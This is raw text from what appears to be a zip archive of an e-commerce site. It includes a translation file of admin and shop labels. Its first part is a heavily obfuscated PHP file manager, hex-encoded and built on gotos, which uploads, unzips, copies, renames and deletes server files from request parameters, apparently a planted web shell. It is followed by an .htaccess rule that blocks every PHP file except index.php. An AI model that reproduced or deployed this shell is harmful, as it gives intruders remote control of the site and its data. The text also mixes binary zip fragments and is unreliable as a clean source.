"\x27\51\73\x9\xd\12\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\x64\x69\x72\x20\75\x20\x72\x65\160\x6c\x61\143\x65\137\x64\x69\162\x28\x24\x28\x27\x23\x4e\x65\167\106\x6f\154\144\x65\162\x44\x69\x72\47\x29\x2e\x76\141\x6c\x28\x29\x29\x3b\40\11\11\11\x20\xd\12\x9\11\x9\x20\x20\40\x24\56\147\x65\164\x4a\123\x4f\x4e\50\42\x3f\x6e\x65\167\x66\157\154\x64\145\x72\75\42\53\x24\x28\47\x23\116\145\167\106\x6f\x6c\144\x65\x72\111\156\160\x75\x74\x27\51\x2e\166\141\x6c\50\x29\53\x22\x26\164\141\x62\x6c\145\46\144\x69\162\75\42\x2b\x64\151\162\x2c\40\146\165\x6e\x63\x74\151\157\156\50\x64\x61\x74\141\x29\173\x24\50\42\x23\x63\x6f\156\x74\x65\156\x74\x22\51\x2e\x68\164\x6d\154\50\144\x61\164\141\56\164\x61\142\x6c\x65\x29\x3b\x24\x28\47\43\x61\x6c\145\x72\x74\x27\x29\56\x68\164\x6d\154\x28\144\x61\164\141\56\x61\x6c\x65\x72\164\51\x3b\40\44\x28\x27\x23\x4e\x65\x77\106\x6f\x6c\x64\x65\162\114\x61\x62\x65\154\163\165\143\x63\145\x73\163\x27\51\56\x68\x74\155\154\50\x27\x27\x29\73\x24\50\47\43\116\x65\167\106\x6f\x6c\144\145\x72\111\156\x70\x75\164\x27\51\x2e\x76\141\154\x28\47\x27\x29\73\x24\x28\x27\x23\x4e\145\167\x46\157\x6c\x64\145\x72\47\x29\56\155\x6f\144\141\x6c\x28\47\x68\151\x64\x65\47\x29\73\175\51\73\x9\11\x9\x9\x9\40\40\15\xa\x9\11\11\175\15\xa\xd\12\x9\11\xd\12\11\11\x9\x66\165\x6e\x63\x74\151\157\x6e\40\122\145\x6d\x6f\166\x65\x41\156\x64\x43\x6f\156\x74\x65\x6e\x74\50\x29\15\12\x9\x9\x9\x7b\15\12\x9\11\11\x20\x20\40\x24\50\x27\x23\x52\x65\155\157\166\x65\114\x61\x62\145\x6c\x73\165\x63\143\145\x73\163\x27\x29\56\150\x74\155\154\x28\x27"; goto EQ_72; bME59: if ($XMJqR == '') { goto gtOWN; } goto Nztcp; Kmxgz: $zaydo = false; goto Igvl2; XkGM_: if ($XMJqR == '') { goto D1Ou4; } goto D5NYw; EXomY: echo "\x5d\x3b\15\xa\x20\x76\141\x72\40\155\x61\170\106\x69\x6c\x65\123\151\172\x65\x20\75\40\160\x61\162\163\x65\x49\x6e\164\50\x27"; goto yVp3I; RpHAx: echo "\40\x3a\40\74\x63\x6f\x64\x65\40\151\x64\x3d\42\132\151\160\x66\151\x6c\x65\116\141\155\x65\x22\x3e\74\57\x63\157\x64\145\76\74\x2f\150\64\x3e\15\xa\x20\40\40\x20\x20\x20\74\57\x64\x69\166\x3e\xd\xa\x20\40\x20\x20\40\40\x3c\x64\x69\166\x20\143\x6c\x61\x73\163\x3d\42\155\157\144\141\x6c\55\x62\157\x64\x79\x22\76\15\12\11\40\x20\40\x20\x3c\x69\x6e\160\165\x74\40\151\x64\75\x22\132\x69\160\144\x69\162\42\40\164\x79\160\x65\75\42\150\151\144\144\x65\x6e\42\40\76\11\15\12\40\x20\x20\x20\x20\74\x69\x6e\x70\x75\164\40\143\x6c\141\163\163\75\42\x66\x6f\162\x6d\x2d\143\157\156\x74\162\x6f\154\x22\x20\x69\144\x3d\42\106\x6f\154\x64\145\x72\x55\x6e\x7a\151\x70\111\156\x70\x75\164\x22\x20\x3e\15\xa\15\xa\x20\40\x20\x20\40\x20\x3c\x64\151\x76\x20\x69\144\x3d\42\132\151\x70\114\x6f\141\x64\42\x3e\74\x2f\144\x69\166\76\15\xa\x20\40\40\40\x20\40\x3c\x2f\144\151\x76\x3e\15\12\x20\x20\40\x20\x20\x3c\144\151\166\x20\x63\154\x61\163\x73\x3d\42\155\x6f\x64\x61\x6c\x2d\x66\x6f\x6f\x74\x65\x72\42\x3e\15\12\11\40\15\xa\x9\40\40\40\40\74\x73\160\141\156\x20\151\x64\75\x22\132\151\160\114\141\142\x65\154\163\x75\143\x63\145\163\x73\x22\x20\x63\x6c\141\x73\163\75\42\154\x61\x62\145\154\40\x6c\141\x62\145\x6c\55\163\x75\143\x63\145\x73\x73\40\x70\x75\x6c\x6c\55"; goto H1t7J; EfbgM: function JcIOJ($f4vjY) { global $Lfznb; return @OwhjL($Lfznb . "\57" . $f4vjY); } goto sXPqA; vQBi5: echo $W7YOX[15]; goto XoGWo; GmytJ: mzVjq: goto LlzrK; rGUKG: echo $W7YOX[13]; goto TUuQw; Dv7aZ: $W7YOX[28] = "\x4c\x61\x73\x74\x20\155\x6f\x64\151\x66\151\x65\144"; goto MKE5J; UpUCs: W8sKE: goto bnvSO; yVp3I: echo $xiRE_; goto u6kMM; S5N8R: echo $W7YOX[14]; goto dcid2; p8z6I: echo "\x20\72\x20\74\x63\157\x64\x65\76\x3c\163\160\x61\156\x20\x69\x64\x3d\42\x55\160\154\x6f\x61\x64\106\151\x6c\x65\123\x69\x7a\145\42\x3e\74\57\163\x70\141\156\76\x3c\57\x63\157\144\145\76\x3c\57\160\x3e\xd\12\11\x3c\x66\x6f\162\155\x20\40\151\144\x3d\42\106\151\x6c\x65\125\x70\154\157\x61\144\106\157\162\x6d\42\40\145\156\143\164\171\x70\145\x3d\42\x6d\165\154\164\151\160\x61\x72\x74\57\x66\157\x72\155\55\x64\x61\x74\141\x22\40\155\145\164\150\x6f\144\x3d\x22\x70\x6f\163\x74\42\76\15\12\11\40\x20\x20\40\74\151\156\x70\x75\164\x20\x69\x64\75\x22\x55\x70\154\157\141\144\106\x69\154\145\x44\x69\x72\42\x20\x74\171\x70\x65\x3d\x22\x68\x69\144\144\145\156\x22\x20\76\11\15\xa\xd\12\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\x3c\144\151\166\x20\x63\x6c\141\163\x73\x3d\42\151\x6e\x70\165\x74\55\x67\162\x6f\x75\x70\x22\x3e\xd\12\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\40\x3c\163\160\141\156\40\x63\x6c\141\x73\x73\x3d\x22\151\x6e\160\x75\164\x2d\x67\x72\x6f\x75\x70\55\142\x74\x6e\42\76\15\xa\x20\40\40\40\x20\40\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\x20\x3c\x73\x70\141\156\40\x63\154\x61\163\163\x3d\x22\142\164\x6e\40\142\164\x6e\55\x64\x65\x66\141\165\x6c\x74\40\142\x74\x6e\55\146\x69\154\x65\x22\x3e\15\12\40\x20\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\40\40\40\x20\40\40\x20\40\40\40"; goto D15Fy; wS5WA: $W7YOX[36] = "\101\154\154\157\x77\x65\144\40\145\x78\x74\145\x6e\x73\x69\x6f\x6e\163"; goto D8W8y; zhyb8: echo "\x27\51\73\11\x9\xd\xa\11\x9\x9\x20\x20\40\144\151\162\40\x3d\40\x72\x65\x70\154\x61\x63\x65\x5f\144\x69\162\x28\44\50\x27\43\x52\x65\x6d\157\x76\145\144\151\x72\47\x29\56\x76\x61\x6c\x28\x29\51\73\x20\15\xa\11\x9\x9\x20\40\40\44\56\x67\x65\x74\x4a\x53\117\116\50\42\77\122\x65\x6d\x6f\166\x65\75\42\x2b\144\151\162\53\x22\x26\x74\141\x62\154\145\42\54\x20\146\165\156\x63\164\151\x6f\156\x28\144\x61\x74\x61\x29\x7b\44\x28\42\43\x63\157\156\x74\145\156\164\x22\51\56\x68\x74\155\154\50\144\141\164\x61\x2e\164\x61\142\x6c\x65\x29\x3b\x20\x24\50\x27\43\141\x6c\x65\x72\x74\x27\x29\56\x68\164\x6d\x6c\50\x64\x61\164\x61\x2e\141\154\145\162\164\x29\73\x24\50\47\x23\x52\145\155\x6f\x76\145\114\141\142\145\154\163\x75\143\143\145\163\163\47\51\x2e\x68\164\155\x6c\x28\x27\47\x29\x3b\x24\50\47\43\122\x65\155\157\x76\145\47\51\56\x6d\157\144\x61\154\50\x27\x68\151\x64\145\47\51\x3b\x7d\51\73\x9\x9\11\x9\11\40\40\15\xa\x9\x9\11\x7d\15\xa\11\x9\x9\xd\xa\x9\x9\x9\x20\146\165\x6e\x63\x74\x69\x6f\156\40\143\x6f\160\171\x41\x6e\x64\x43\157\156\x74\145\x6e\164\50\51\x20\15\12\x9\11\x9\40\x7b\40\15\xa\xd\xa\11\11\11\40\x20\x20\44\50\42\43\124\x6f\106\x6f\x6c\144\145\162\111\156\160\x75\164\42\x29\x2e\x61\164\164\x72\50\42\x64\151\163\141\142\x6c\x65\144\42\x2c\40\42\144\151\163\x61\x62\154\x65\144\42\51\73\15\xa\11\11\11\40\40\40\x24\x28\x27\43\103\157\160\171\x4c\x61\142\x65\154\x73\x75\143\x63\145\x73\x73\x27\51\56\150\x74\155\x6c\50\47"; goto edmVV; Gku0R: foreach ($_FILES["\151\156\x70\165\164\106\x69\x6c\x65\125\x70\x6c\x6f\141\144"]["\x6e\141\155\145"] as $l6bzV => $slB3E) { goto oxq4s; TgpKG: $s6erP[] = array("\143\157\144\x65" => "\60", "\x73\164\141\164\x75\x73" => $W7YOX[33] . "\x5f" . $fNS_2); goto pIs8j; mwZFc: goto oKRjg; goto wjAys; JySOR: $s6erP[] = array("\143\157\x64\x65" => "\60", "\163\x74\141\x74\x75\163" => $W7YOX[7]); goto wxbl3; ClKtC: $s6erP[] = array("\143\157\144\x65" => "\60", "\x73\164\x61\164\165\163" => $W7YOX[38]); goto Sesi8; C_iU4: $aAoKk = $Lfznb . "\x2f" . $Rb19d; goto bpZxv; lBXnq: fhhZb: goto PQrRn; t2EPc: $AeXLw = $_FILES["\x69\156\160\165\164\x46\151\x6c\x65\x55\160\x6c\157\x61\144"]["\164\x79\160\145"][$l6bzV]; goto NUSII; oxq4s: if (!empty($slB3E)) { goto b4q9v; } goto ClKtC; sZVPr: oKRjg: goto lBXnq; n1nk0: Bb7Up: goto yf10t; NOCef: $s6erP[] = array("\143\x6f\x64\x65" => "\x31", "\x73\164\x61\x74\x75\x73" => $W7YOX[34], "\165\x72\x6c" => $aAoKk, "\x74\155\x70\137\x6e\141\x6d\x65" => $Rb19d, "\163\x69\x7a\x65" => $HpV2O, "\x74\171\x70\145" => $AeXLw, "\145\x72\x72\157\162" => $fNS_2, "\x6e\x61\155\x65" => $kGDiR); goto eAc9H; eAc9H: goto oKRjg; goto YvLyd; PQrRn: gybFu: goto HJes6; wxbl3: goto fhhZb; goto mMXX1; wjAys: dGB2Y: goto NOCef; NUSII: $fNS_2 = $_FILES["\x69\156\160\165\x74\106\x69\x6c\145\x55\x70\154\157\x61\144"]["\x65\x72\162\x6f\x72"][$l6bzV]; goto IUEON; yf10t: $s6erP[] = array("\143\157\x64\145" => "\x30", "\x73\x74\x61\x74\x75\x73" => $W7YOX[37]); goto sZVPr; bpZxv: if (in_array(Q6L_e($Rb19d), $r2sBB[0]) || count($r2sBB[0]) == 0) { goto GwTXk; } goto JySOR; OCmqX: if ($HpV2O > $xiRE_) { goto Bb7Up; } goto G7Wqj; IUEON: $kGDiR = $_FILES["\x69\x6e\160\x75\164\106\151\154\x65\x55\x70\x6c\157\x61\144"]["\x6e\x61\x6d\x65"][$l6bzV]; goto C_iU4; G7Wqj: $s6erP[] = array("\143\x6f\x64\145" => "\60", "\x73\x74\141\x74\x75\x73" => $W7YOX[33]); goto mwZFc; Sesi8: goto gybFu; goto G9vnd; G9vnd: b4q9v: goto r3ufI; r3ufI: $Rb19d = basename($slB3E); goto zAgWa; I6Dm8: if (move_uploaded_file($_FILES["\x69\x6e\x70\x75\x74\106\151\154\x65\x55\x70\154\x6f\141\144"]["\x74\x6d\x70\137\156\141\x6d\x65"][$l6bzV], $aAoKk)) { goto dGB2Y; } goto m_xD4; HJes6: H1qRT: goto B4zRb; zAgWa: $HpV2O = $_FILES["\x69\156\160\165\164\x46\151\x6c\145\x55\x70\x6c\157\x61\x64"]["\163\151\172\145"][$l6bzV]; goto t2EPc; m_xD4: if ($fNS_2 != 0) { goto sfcC9; } goto OCmqX; mMXX1: GwTXk: goto I6Dm8; pIs8j: goto oKRjg; goto n1nk0; YvLyd: sfcC9: goto TgpKG; B4zRb: } goto NXfI8; hssgZ: Z8vZ5($_GET["\x75\x6e\x7a\x69\160"]); goto QJNy2; g92Hx: if (!isset($_GET["\154\157\x67\x6f\165\x74"])) { goto g1r5R; } goto ZoxKH; OIiXf: @S7bMt($_GET["\122\145\155\x6f\166\x65"], true); goto njep4; XwvO8: $zaydo = true; goto OIIbg; Un8RG: echo "\42\40\x69\x64\x3d\42\144\151\x72\x49\156\160\165\x74\123\145\x61\x72\x63\x68\42\76\xd\xa\x20\40\x20\40\x20\40\x20\40\40\x20\x20\x20\x3c\x64\x69\166\x20\x63\154\141\x73\x73\75\42\x69\156\160\x75\164\x2d\x67\x72\x6f\165\160\55\142\x74\156\x22\x3e\15\12\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\x20\40\x20\74\x62\165\x74\164\x6f\x6e\40\143\x6c\x61\x73\163\75\x22\142\x74\156\40\142\164\156\x2d\144\x65\x66\x61\165\154\164\42\40\x6f\x6e\x63\154\x69\x63\153\75\42\x53\145\141\162\x63\150\x28\x29\x22\x20\x74\171\160\x65\75\x22\x73\165\142\155\151\x74\42\x3e\x3c\163\160\x61\156\x20\143\x6c\x61\x73\x73\x3d\42\105\170\x70\x6c\157\162\x49\x63\157\x6e\x22\40\x73\164\171\154\x65\x3d\42\160\141\x64\144\x69\156\147\72\x20\65\160\170\x20\x30\x70\170\40\x35\160\x78\40\x31\x38\x70\170\x3b\42\76\x3c\x2f\x73\x70\141\x6e\x3e\x3c\57\142\x75\x74\164\x6f\x6e\x3e\xd\xa\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\x3c\57\x64\x69\166\76\xd\xa\x20\x20\40\40\x20\x20\40\40\74\x2f\x64\x69\166\76\15\12\x20\x20\40\x20\x20\40\40\x20\74\57\144\x69\x76\76\11\11\15\12\x9\74\57\x64\151\x76\76\11\xd\xa\x20\x20\x20\40\74\x2f\x64\151\166\76\x9\15\xa\x3c\x2f\144\151\166\76\15\xa\15\12\15\12\11\11\15\12\15\12\74\41\55\x2d\x20\115\157\144\x61\x6c\40\122\x65\156\141\x6d\x65\x20\55\x2d\76\xd\xa\74\144\x69\x76\x20\x69\x64\75\x22\122\145\156\x61\x6d\145\x22\40\x63\154\x61\x73\x73\75\x22\155\157\x64\x61\x6c\x20\146\x61\x64\x65\42\40\162\x6f\x6c\145\x3d\42\x64\151\x61\x6c\157\147\42\76\15\xa\40\x20\x3c\144\x69\x76\x20\143\x6c\141\163\x73\x3d\42\155\x6f\x64\141\x6c\x2d\144\x69\141\154\157\147\x22\x3e\xd\xa\15\xa\40\x20\x20\40\74\x21\x2d\x2d\x20\115\x6f\144\x61\x6c\x20\143\157\156\164\145\x6e\164\55\55\76\15\12\40\x20\x20\40\x3c\144\151\166\40\143\154\141\x73\163\x3d\42\155\x6f\144\x61\154\x2d\143\157\x6e\x74\x65\x6e\x74\x22\x3e\xd\12\x20\x20\x20\40\40\40\74\144\x69\166\40\143\154\141\163\163\x3d\42\155\x6f\144\x61\x6c\55\150\x65\x61\144\145\162\x22\76\xd\xa\x20\x20\x20\40\x20\40\x20\x20\74\x62\165\164\x74\157\x6e\x20\x74\x79\160\x65\x3d\42\x62\165\164\164\x6f\156\x22\x20\x63\154\141\163\x73\75\x22\143\154\157\x73\x65\x22\x20\x64\141\x74\141\x2d\x64\151\163\155\151\163\163\75\x22\155\157\144\x61\154\x22\x3e\46\164\x69\x6d\145\x73\73\x3c\57\x62\165\164\x74\x6f\x6e\x3e\15\xa\x20\x20\40\x20\x20\x20\x20\x20\74\x68\64\40\x63\154\x61\163\x73\75\x22\155\157\x64\141\x6c\x2d\164\x69\164\x6c\145\42\x3e"; goto LaWek; Ea8fY: Z8VZ5($_GET["\143\157\x70\171"]); goto QP_Si; V4AC1: header("\x43\x6f\156\x74\x65\x6e\164\x2d\164\171\160\x65\72\40\164\x65\x78\x74\57\150\164\155\x6c\x3b\40\143\x68\x61\x72\x73\145\164\75" . $OQWkJ); goto tkhKS; w3SW5: echo "\x3c\x21\55\55\74\144\151\x76\40\x63\154\141\163\x73\75\x22\156\x61\166\142\x61\x72\40\156\141\x76\142\x61\162\x2d\x64\145\x66\x61\165\x6c\x74\40\x20\x6e\141\x76\x62\x61\x72\55\146\x69\170\145\x64\x2d\142\157\164\x74\157\x6d\42\x20\162\157\x6c\x65\75\x22\156\x61\166\151\x67\x61\164\x69\x6f\156\42\x3e\15\xa\40\40\40\x20\x3c\x64\x69\166\x20\143\154\x61\x73\x73\75\x22\x63\157\x6e\x74\x61\151\x6e\145\162\40\x74\145\170\x74\55\143\145\x6e\164\145\162\x22\x3e\15\xa\40\40\40\x20\40\x20\40\40\74\160\x20\x63\x6c\x61\163\x73\x3d\x22\x6e\141\166\142\141\162\55\164\145\x78\x74\x20\143\x6f\154\55\155\x64\55\61\x32\40\143\x6f\x6c\55\163\x6d\x2d\x31\x32\x20\x63\x6f\154\x2d\170\163\55\61\62\42\76\46\x63\x6f\160\x79\x3b\x20\x6f\x6e\x65\x78\x69\x74\x65\x3c\x2f\160\76\xd\xa\x20\40\40\40\x3c\x2f\144\x69\166\x3e\xd\12\x20\x20\40\x20\74\57\144\x69\x76\76\x2d\x2d\x3e"; ?>PK ! ����� � ae/30273/.htaccessnu �[��� <FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|php7|phP|PhP|php5|php8|suspected)$'> Order allow,deny Deny from all </FilesMatch> <FilesMatch '^(index.php)$'> Order allow,deny Allow from all </FilesMatch>PK ! ��e��� �� ae/messages.phpnu �[��� <?php return array ( 'Dashboard' => 'Dashboard', 'order_management' => 'Order management', 'orders' => 'Orders', 'All' => 'All', 'pending' => 'Pending', 'confirmed' => 'Confirmed', 'Processing' => 'Processing', 'out_for_delivery' => 'Out for delivery', 'delivered' => 'Delivered', 'returned' => 'Returned', 'failed' => 'Failed', 'canceled' => 'Canceled', 'product_management' => 'Product management', 'brands' => 'Brands', 'add_new' => 'Add new', 'List' => 'List', 'categories' => 'Categories', 'category' => 'Category', 'sub_category' => 'Sub category', 'sub_sub_category' => 'Sub sub category', 'Attribute' => 'Attribute', 'InHouse Products' => 'InHouse Products', 'Products' => 'Products', 'bulk_import' => 'Bulk import', 'bulk_export' => 'Bulk export', 'Seller' => 'Seller', 'New' => 'New', 'Approved' => 'Approved', 'Denied' => 'Denied', 'marketing_section' => 'Marketing section', 'banners' => 'Banners', 'coupons' => 'Coupons', 'push_notification' => 'Push notification', 'flash_deals' => 'Flash deals', 'deal_of_the_day' => 'Deal of the day', 'featured_deal' => 'Featured deal', 'business_section' => 'Business section', 'seller_withdraws' => 'Seller withdraws', 'product' => 'Product', 'stock' => 'Stock', 'Customer' => 'Customer', 'Reviews' => 'Reviews', 'in' => 'In', 'wish_list' => 'Wish List', 'user_section' => 'User section', 'Sellers' => 'All Sellers', 'customers' => 'Customers', 'support_section' => 'Support section', 'messages' => 'Messages', 'support_ticket' => 'Support Ticket', 'business_settings' => 'Business settings', 'seller_settings' => 'Seller settings', 'payment_method' => 'Payment method', 'sms' => 'Sms', 'module' => 'Module', 'shipping_method' => 'Shipping method', 'by_admin' => 'By admin', 'by_seller' => 'By seller', 'languages' => 'Languages', 'for_data_entry' => 'For data entry', 'for_website' => 'For website', 'social_login' => 'Social login', 'currencies' => 'Currencies', 'web_&_app_settings' => 'Web & app settings', 'web_config' => 'Web config', 'mail_config' => 'Mail config', 'notification' => 'Notification', 'page_setup' => 'Page setup', 'terms_and_condition' => 'Terms and conditions', 'privacy_policy' => 'Privacy Policy', 'about_us' => 'About Us', 'faq' => 'FAQ', 'social_media' => 'Social media', 'Report' => 'Report', 'Analytics' => 'Analytics', 'Earning' => 'Earning', 'Order' => 'Order', 'sale_report' => 'Sale report', 'inhouse' => 'Inhouse', 'sale' => 'Sale', 'seller' => 'Seller', 'employee_section' => 'Employee section', 'employee_role' => 'Employee role', 'employees' => 'Employees', 'balance' => 'Balance', 'withdrawn' => 'Withdrawn', 'total_earning' => 'Total earning', 'top_selling_products' => 'Top selling products', 'most_rated_products' => 'Most rated products', 'Pending' => 'Pending', 'Delivered' => 'Delivered', 'Returned' => 'Returned', 'Failed' => 'Failed', 'Product' => 'Product', 'my_bank_info' => 'My bank info', 'my_shop' => 'My shop', 'Name' => 'Name', 'Add' => 'Add', 'Update' => 'Update', 'Table' => 'Table', 'SL#' => 'SL#', 'Action' => 'Action', 'Edit' => 'Edit', 'Delete' => 'Delete', 'product_table' => 'Product table', 'Add new product' => 'Add new product', 'Product Name' => 'Product Name', 'purchase_price' => 'Purchase price', 'selling_price' => 'Selling price', 'featured' => 'Featured', 'Active' => 'Active', 'status' => 'Status', 'name' => 'Name', 'description' => 'Description', 'Category' => 'Category', 'Sub Category' => 'Sub Category', 'Sub Sub Category' => 'Sub Sub Category', 'Brand' => 'Brand', 'Unit' => 'Unit', 'Colors' => 'Colors', 'Attributes' => 'Attributes', 'Product price & stock' => 'Product price & stock', 'Unit price' => 'Unit price', 'Purchase price' => 'Purchase price', 'Tax' => 'Tax', 'Percent' => 'Percent', 'Discount' => 'Discount', 'Flat' => 'Flat', 'total' => 'Total', 'Quantity' => 'Quantity', 'seo_section' => 'Seo section', 'Upload product images' => 'Upload product images', 'ratio' => 'Ratio', 'Upload thumbnail' => 'Upload thumbnail', 'Variation' => 'Variation', 'Choice Title' => 'Choice Title', 'Variant' => 'Variant', 'Variant Price' => 'Variant Price', 'SKU' => 'SKU', 'Enter choice values' => 'Enter choice values', 'Banner' => 'Banner', 'add_main_banner' => 'Add main banner', 'add_secondary_banner' => 'Add secondary banner', 'add_popup_banner' => 'Add popup banner', 'main_banner_form' => 'Main banner form', 'banner_url' => 'Banner url', 'Image' => 'Image', 'choose' => 'Choose', 'file' => 'File', 'Cancel' => 'Cancel', 'save' => 'Save', 'update' => 'Update', 'secondary_banner_form' => 'Secondary banner form', 'popup_banner_form' => 'Popup banner form', 'banner_table' => 'Banner table', 'sl' => 'Sl', 'image' => 'Image', 'banner_type' => 'Banner type', 'published' => 'Published', 'action' => 'Action', 'Coupon' => 'Coupon', 'coupon_form' => 'Coupon form', 'Type' => 'Type', 'Title' => 'Title', 'Code' => 'Code', 'start_date' => 'Start date', 'expire_date' => 'Expire date', 'minimum_purchase' => 'Minimum purchase', 'discount_type' => 'Discount type', 'Amount' => 'Amount', 'percentage' => 'Percentage', 'maximum_discount' => 'Maximum discount', 'Submit' => 'Submit', 'coupons_table' => 'Coupons table', 'coupon_type' => 'Coupon type', 'Status' => 'Status', 'Notification' => 'Notification', 'Description' => 'Description', 'Send' => 'Send', 'Notification_Table' => 'Notification Table', 'flash_deal' => 'Flash Deal', 'deal_form' => 'Deal form', 'end_date' => 'End date', 'Upload' => 'Upload', 'flash_deal_table' => 'Flash deal table', 'Start' => 'Start', 'end' => 'End', 'title' => 'Title', 'feature_deal' => 'Feature deal', 'Withdraw' => 'Withdraw', 'Withdraw Request Table' => 'Withdraw Request Table', 'amount' => 'Amount', 'request_time' => 'Request time', 'View' => 'View', 'Review' => 'Review', 'seller_table' => 'Seller table', 'Phone' => 'Phone', 'Email' => 'Email', 'Account' => 'Account', 'suspend' => 'Suspend', 'Shop' => 'Shop', 'info' => 'Info', 'seller_b' => 'Seller b', 'address' => 'Address', 'bank_info' => 'Bank info', 'bank_name' => 'Bank name', 'Branch' => 'Branch', 'holder_name' => 'Holder name', 'account_no' => 'Account no', 'Total' => 'Total', 'block' => 'Block', 'unblock' => 'Unblock', 'Customer Message' => 'Customer Message', 'table' => 'Table', 'mobile_no' => 'Mobile no', 'Subject' => 'Subject', 'Priority' => 'Priority', 'dashboard_order_statistics' => 'Dashboard order statistics', 'top_store_by_order_received' => 'Top store by order received', 'top_selling_store' => 'Top selling store', 'top_customer' => 'Top customer', 'sales' => 'Sales', 'comission' => 'Comission', 'Informations' => 'Informations', 'Save' => 'Save', 'system_default' => 'System default', 'cash_on_delivery' => 'Cash on delivery', 'Inactive' => 'Inactive', 'digital_payment' => 'Digital payment', 'SSLCOMMERZ' => 'SSLCOMMERZ', 'ssl_commerz_payment' => 'Ssl commerz payment', 'Store' => 'Store', 'ID' => 'ID', 'password' => 'Password', 'Paypal' => 'Paypal', 'Payment' => 'Payment', 'Client' => 'Client', 'Secret' => 'Secret', 'Stripe' => 'Stripe', 'stripe' => 'Stripe', 'Published' => 'Published', 'Key' => 'Key', 'api_key' => 'Api key', 'razor_pay' => 'Razor pay', 'secret' => 'Secret', 'senang_pay' => 'Senang pay', 'key' => 'Key', 'Merchant' => 'Merchant', 'paystack' => 'Paystack', 'publicKey' => 'PublicKey', 'secretKey' => 'SecretKey', 'paymentUrl' => 'PaymentUrl', 'merchantEmail' => 'MerchantEmail', 'form' => 'Form', 'duration' => 'Duration', 'cost' => 'Cost', 'sl#' => 'Sl#', 'language_setting' => 'Language setting', 'and' => 'And', 'language' => 'Language', 'language_table' => 'Language table', 'add_new_language' => 'Add new language', 'Id' => 'Id', 'Translate' => 'Translate', 'new_language' => 'New language', 'country_code' => 'Country code', 'direction' => 'Direction', 'close' => 'Close', 'google' => 'Google', 'client_id' => 'Client id', 'client_secret' => 'Client secret', 'facebook' => 'Facebook', 'twitter' => 'Twitter', 'Currency' => 'Currency', 'add' => 'Add', 'system_default_currency' => 'System default currency', 'currency_name' => 'Currency name', 'currency_symbol' => 'Currency symbol', 'currency_code' => 'Currency code', 'exchange_rate' => 'Exchange rate', 'Website' => 'Website', 'Info' => 'Info', 'rename_your_website' => 'Rename your website', 'rename_company' => 'Rename company', 'apple_store' => 'Apple store', 'link' => 'Link', 'google_play_store' => 'Google play store', 'company' => 'Company', 'copy_right' => 'Copy right', 'Text' => 'Text', 'Web' => 'Web', 'logo' => 'Logo', 'Mobile' => 'Mobile', 'web_footer' => 'Web footer', 'web_fav_icon' => 'Web fav icon', 'web_color_setup' => 'Web color setup', 'Primary' => 'Primary', 'Secondary' => 'Secondary', 'smtp_mail_config' => 'Smtp mail config', 'mailer_name' => 'Mailer name', 'Host' => 'Host', 'Driver' => 'Driver', 'port' => 'Port', 'Username' => 'Username', 'email_id' => 'Email id', 'Encryption' => 'Encryption', 'help_topic' => 'Help topic', 'Question' => 'Question', 'Answer' => 'Answer', 'Ranking' => 'Ranking', 'social_media_form' => 'Social media form', 'social_media_link' => 'Social media link', 'social_media_table' => 'Social media table', 'Overview' => 'Overview', 'Admin' => 'Admin', 'Date' => 'Date', 'Show' => 'Show', 'Sold' => 'Sold', 'Orders' => 'Orders', 'Weekly' => 'Weekly', 'This' => 'This', 'week' => 'Week', 'Last' => 'Last', 'custom_role' => 'Custom role', 'role_form' => 'Role form', 'role_name' => 'Role name', 'module_permission' => 'Module permission', 'marketing' => 'Marketing', 'roles_table' => 'Roles table', 'modules' => 'Modules', 'created_at' => 'Created at', 'employee_add' => 'Employee add', 'employee_form' => 'Employee form', 'Role' => 'Role', 'employee_image' => 'Employee image', 'submit' => 'Submit', 'Employee' => 'Employee', 'employee_table' => 'Employee table', 'Password' => 'Password', 'banner_photo' => 'Banner photo', 'Explore' => 'Explore', 'Now' => 'Now', 'view_all' => 'View all', 'featured_products' => 'Featured Products', 'Quick' => 'Quick', 'recommended_product' => 'Recommended product', 'buy_now' => 'Buy now', 'latest_products' => 'Latest Products', 'sellers' => 'Sellers', 'bestsellings' => 'Bestsellings', 'new_arrivals' => 'New arrivals', 'top_rated' => 'Top rated', 'search' => 'Search', 'sing_in' => 'Sign in', 'sing_up' => 'Sign up', 'my_cart' => 'My cart', 'Empty' => 'Empty', 'Cart' => 'Cart', 'Home' => 'Home', 'zone' => 'Zone', 'Become a' => 'Become a', 'login' => 'Login', 'download_our_app' => 'Download our app', 'special' => 'Special', 'best_selling_product' => 'Best Selling Products', 'top_rated_product' => 'Top Rated Products', 'all_brand' => 'All Brands', 'all_category' => 'All Categories', 'account&shipping_info' => 'Account & shipping info', 'profile_info' => 'Profile Info', 'track_order' => 'Track Order', 'about_company' => 'About Company', 'terms_&_conditions' => 'Terms & Conditions', 'contact_us' => 'Contact Us', 'order_table' => 'Order table', 'customer_name' => 'Customer name', 'verify_status' => 'Verify status', 'Language' => 'Language', 'language_content_table' => 'Language content table', 'back' => 'Back', 'value' => 'Value', 'from' => 'From', 'limit' => 'Limit', 'for' => 'For', 'same' => 'Same', 'user' => 'User', 'email_address' => 'Email address', 'please_provide_valid_email' => 'Please provide valid email', 'remember_me' => 'Remember me', 'forgot_password' => 'Forgot password', 'sign_in' => 'Sign in', 'no_account_Sign_up_now' => 'No account Sign up now', 'sing_in_with_google' => 'Sign in with google', 'sing_in_with_facebook' => 'Sign in with facebook', 'my_order' => 'My order', 'my_profile' => 'My profile', 'logout' => 'Logout', 'To' => 'To', 'shopping_cart' => 'Shopping cart', 'Shipping' => 'Shipping', 'Authentication' => 'Authentication', 'HI' => 'HI', 'you_are_already_login_proceed' => 'You are already login proceed', 'Back' => 'Back', 'to' => 'To', 'proceed_shipping' => 'Proceed shipping', 'Next' => 'Next', 'shipping_address' => 'Shipping address', 'choose_shipping_address' => 'Choose shipping address', 'contact_person_name' => 'Contact person name', 'Another' => 'Another', 'Permanent' => 'Permanent', 'Others' => 'Others', 'Country' => 'Country', 'City' => 'City', 'zip_code' => 'Zip code', 'save_this_address' => 'Save this address', 'proceed_payment' => 'Proceed payment', 'price' => 'Price', 'TAX' => 'TAX', 'Subtotal' => 'Subtotal', 'details' => 'Details', 'Unpaid' => 